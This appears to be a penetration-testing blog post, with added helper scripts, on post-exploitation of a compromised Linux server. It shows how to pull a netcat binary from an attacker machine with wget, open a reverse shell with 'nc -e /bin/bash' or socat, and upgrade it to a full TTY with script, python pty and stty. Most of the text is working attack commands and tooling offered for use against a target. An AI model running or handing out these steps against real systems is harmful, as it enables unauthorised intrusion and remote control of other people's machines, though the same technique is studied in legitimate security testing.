During a recent application exploit that landed in a limited interactive shell, the usual route of spawning a reverse shell and upgrading it to a TTY was attempted.
The go-to tools for this (python, php, socat, ruby) turned out to be unavailable on the target, so the following steps were taken to spawn the reverse shell and upgrade it to a TTY (the original post illustrates them with a screenshot of the exploit):
First of all, if you just want the short version and do not care about the explanation, type the following into the pseudo terminal (the script command itself runs on the target; the stty/fg/reset part is typed in your local terminal after backgrounding nc with CTRL+Z):
/usr/bin/script -qc /bin/bash /dev/null
# then CTRL+Z, and in the local terminal: stty raw -echo; fg; reset
This breaks you out of the pseudo terminal and into a TTY shell; you can then su and run any other terminal-based commands. For those who want the longer walkthrough, or for whom the above does not work 100%, one of many ways to do this is below.
Copy over NC and spawn a shell
Using wget on the target and python's SimpleHTTPServer on the attacking machine (python3 -m http.server is the equivalent on Python 3), nc was easily moved over to the target:
Attacking Machine: cp /usr/bin/nc .; python -m SimpleHTTPServer 9998
Server: cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc
---------------------------------------------------------------------
Attacking Machine: nc -nlvp 9998   # stop the HTTP server first, or use a different port: both cannot listen on 9998 at once
Server: ./nc 10.x.x.x 9998 -e /bin/bash
Two caveats: the copied nc must be a variant that supports -e (traditional netcat or ncat; the OpenBSD netcat shipped as the default nc on many distributions has no -e), and it must run on the target's architecture and libc, so a statically linked binary is the safer choice.
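Before shipping a binary across as above, two things are worth checking on the attacking machine: that the local nc actually has an exec flag, and that the target can verify the file arrived intact. The helper below is an added example and not code from the original post; it takes nc's help text as an argument so it can be checked offline (pass "$(nc -h 2>&1)" for the real binary), and the help strings and the fake binary in the demo are constructed for illustration, not captured from any system.

```shell
#!/bin/sh
# Added example (not from the original post): pre-flight checks before
# serving a netcat binary to the target with SimpleHTTPServer/wget.

# Return 0 if a netcat help text advertises an exec flag: "-e prog" in
# traditional netcat, "-e, --exec" in ncat. OpenBSD nc lists neither.
nc_help_supports_exec() {
    printf '%s\n' "$1" | grep -Eq -- '(^|[[:space:]])-e([[:space:]]|,)|--exec'
}

# Checksum with sha256sum when available, falling back to POSIX cksum so the
# same function works on a minimal target after the transfer.
checksum_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        cksum "$1" | cut -d' ' -f1
    fi
}

# stage_binary SRC DIR: copy SRC into the directory you will serve, make it
# executable, write DIR/<name>.sum next to it and print the checksum, so the
# target can run `wget .../nc.sum` and compare after `wget .../nc`.
stage_binary() {
    src=$1; dir=$2
    name=$(basename "$src")
    mkdir -p "$dir"
    cp "$src" "$dir/$name"
    chmod +x "$dir/$name"
    sum=$(checksum_of "$dir/$name")
    printf '%s\n' "$sum" > "$dir/$name.sum"
    printf '%s\n' "$sum"
}

# Constructed, abbreviated help texts (assumptions for the demo, not real
# captured output) for the three common netcat flavours.
OPENBSD_HELP='usage: nc [-46CDdFhklNnrStUuvZz] [-C certfile] [-x proxy_address[:port]]'
TRADITIONAL_HELP='-e prog                 program to exec after connect [dangerous!!]'
NCAT_HELP='-e, --exec <command>       Executes the given command'

# Demo: decide whether this nc is worth copying, then stage a fake binary.
for h in "$OPENBSD_HELP" "$TRADITIONAL_HELP" "$NCAT_HELP"; do
    if nc_help_supports_exec "$h"; then echo "exec flag: yes"; else echo "exec flag: no"; fi
done
demo=$(mktemp -d)
printf '#!/bin/sh\necho fake nc\n' > "$demo/nc"
stage_binary "$demo/nc" "$demo/www" >/dev/null
# Serve with: cd "$demo/www" && python -m SimpleHTTPServer 9998
echo "staged $(ls "$demo/www" | tr '\n' ' ')"
```

On the target, after the wget, `[ "$(sha256sum nc | cut -d' ' -f1)" = "$(cat nc.sum)" ]` confirms the download was not truncated before you chmod and run it.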
Break out of pseudo shell and upgrade to a tty shell
In order to upgrade our shell we first need to break out of the pseudo shell we are in.
First we need to upgrade to a pty shell; generally I would default to trusty python using the following:
python -c 'import pty; pty.spawn("/bin/bash")'
# OR using socat:
Attacking Server: socat file:`tty`,raw,echo=0 tcp-listen:9998
Victim Machine: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.x.x.x:9998
As neither of our preferred tools was available, we can fall back on a simpler and seemingly long-forgotten way of upgrading: script (part of util-linux, so present on almost every Linux box).
In the reverse nc shell we caught on our attacking machine, we break out of the pseudo shell with the following command. It is typed into the reverse shell, so it executes on the target and gives bash a real pty there:
Attacking Machine (inside the caught reverse shell): /usr/bin/script -qc /bin/bash /dev/null
All that is left is to do the following:
A: CTRL + Z to background the shell
B: paste or type the following into the terminal on the attacking machine. stty raw -echo stops your local terminal from interpreting keystrokes such as CTRL+C and from echoing them, since the remote pty now does both; fg brings nc back to the foreground; reset restores your local terminal once the session ends.
stty raw -echo; fg; reset
Now you have a fully interactive shell with tab completion, job control and a working CTRL+C, and can continue to exploit the server and potentially run su or local ssh commands on it.
Granted, there are many more ways to achieve the same shell, but using script seems to be overlooked quite often, hence the post.
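To put the whole procedure in one place, here is an added example (not code from the original post): a target-side helper that picks a pty spawner from what is actually installed, preferring python and falling back to util-linux script exactly as above, plus a local helper that builds the terminal fix-up to paste into the upgraded shell. The preference order, the xterm default and the 24x80 fallback size are assumptions of this example; the script form assumes util-linux script (BSD/macOS script takes a different syntax and is not handled).

```shell
#!/bin/sh
# Added example (not from the original post): choose a pty spawner on the
# target and fix up the remote terminal after the stty raw -echo; fg dance.

# Map a tool name to the command that gives a pty using that tool.
spawner_for() {
    case "$1" in
        python3) printf '%s\n' "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'" ;;
        python)  printf '%s\n' "python -c 'import pty; pty.spawn(\"/bin/bash\")'" ;;
        script)  printf '%s\n' "script -qc /bin/bash /dev/null" ;;
        *)       return 1 ;;
    esac
}

# Probe the live system with POSIX command -v; print the tools found.
detect_tools() {
    found=""
    for tool in python3 python script; do
        command -v "$tool" >/dev/null 2>&1 && found="$found $tool"
    done
    printf '%s\n' "${found# }"
}

# pick_spawner "python script": command for the first available tool in
# preference order; returns 1 and prints nothing when none is present.
pick_spawner() {
    avail=" $1 "
    for tool in python3 python script; do
        case "$avail" in
            *" $tool "*) spawner_for "$tool"; return 0 ;;
        esac
    done
    return 1
}

# After `stty raw -echo; fg` the remote pty knows neither your terminal size
# nor TERM, so vi, less and the like misbehave. Build the one-liner to paste
# into the remote shell from the local rows/cols (TERM defaults to xterm).
remote_term_fixup() {
    rows=$1; cols=$2; term=${3:-xterm}
    printf 'export TERM=%s; stty rows %s columns %s\n' "$term" "$rows" "$cols"
}

# Read the local terminal size; fall back to 24x80 when stdin is not a tty
# (for example when this runs from a script rather than your terminal).
local_term_fixup() {
    if [ -t 0 ]; then
        set -- $(stty size)
        remote_term_fixup "$1" "$2" "${TERM:-xterm}"
    else
        remote_term_fixup 24 80 "${TERM:-xterm}"
    fi
}

# Target side, typed into the dumb reverse shell:
#   eval "$(pick_spawner "$(detect_tools)")" || echo "no pty spawner found"
# Then CTRL+Z locally, `stty raw -echo; fg`, and paste this into the remote:
local_term_fixup
```

Running `tty` in the remote shell afterwards should print a /dev/pts/N device rather than "not a tty"; if it still says "not a tty", the spawner never ran and the stty dance will only have left your local terminal in raw mode (reset fixes that).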